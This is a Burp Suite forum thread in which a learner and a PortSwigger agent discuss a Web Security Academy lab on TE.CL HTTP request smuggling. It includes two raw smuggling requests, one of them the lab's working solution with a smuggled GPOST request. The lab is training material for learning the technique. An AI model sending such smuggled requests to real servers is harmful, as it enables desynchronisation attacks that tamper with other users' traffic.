Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

"Lab: HTTP request smuggling, basic TE.CL vulnerability" need help in understanding

Anton | Last updated: Feb 17, 2020 03:15PM UTC

Hello, I'm trying to figure out what is going on under the hood but with no luck so far. Trying following as a possible solution I don't understand why the Response is "Unrecognized method G0POST" Why there is a zero before "POST" Request: POST / HTTP/1.1 Host: ac2f1f0e1ea3d02180733e8600de008b.web-security-academy.net Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked Content-length: 3 1 G 0 I appreciate any help. Thanks.

Hannah, PortSwigger Agent | Last updated: Feb 17, 2020 03:53PM UTC

Because your content-length is 3, that means that your first request stops after the "1". The following characters are prepended to the next post request. When the next request is sent, the G and 0 are prepended to the POST. This is why it will come up with G0POST. Have you had a look at the solution for the lab you are trying to complete? The TE.CL solution request looks significantly different to your request.

Anton | Last updated: Feb 17, 2020 04:15PM UTC

Yes, I solved the lab with solution provided in the lab. I guess I see what is going on there. Correct me please if my understanding is wrong. Request: ... Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0 ----------------- Content-length: 4 - that means that "5c\r\n" that first request stops right after this blob. GPOST / HTTP/1.1 - instead of prepending "G" to "POST" (that I wast trying to achieve) it explicitly issues a GPOST request. Does it sound right?

Hannah, PortSwigger Agent | Last updated: Feb 17, 2020 04:33PM UTC

Yes, that is correct.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.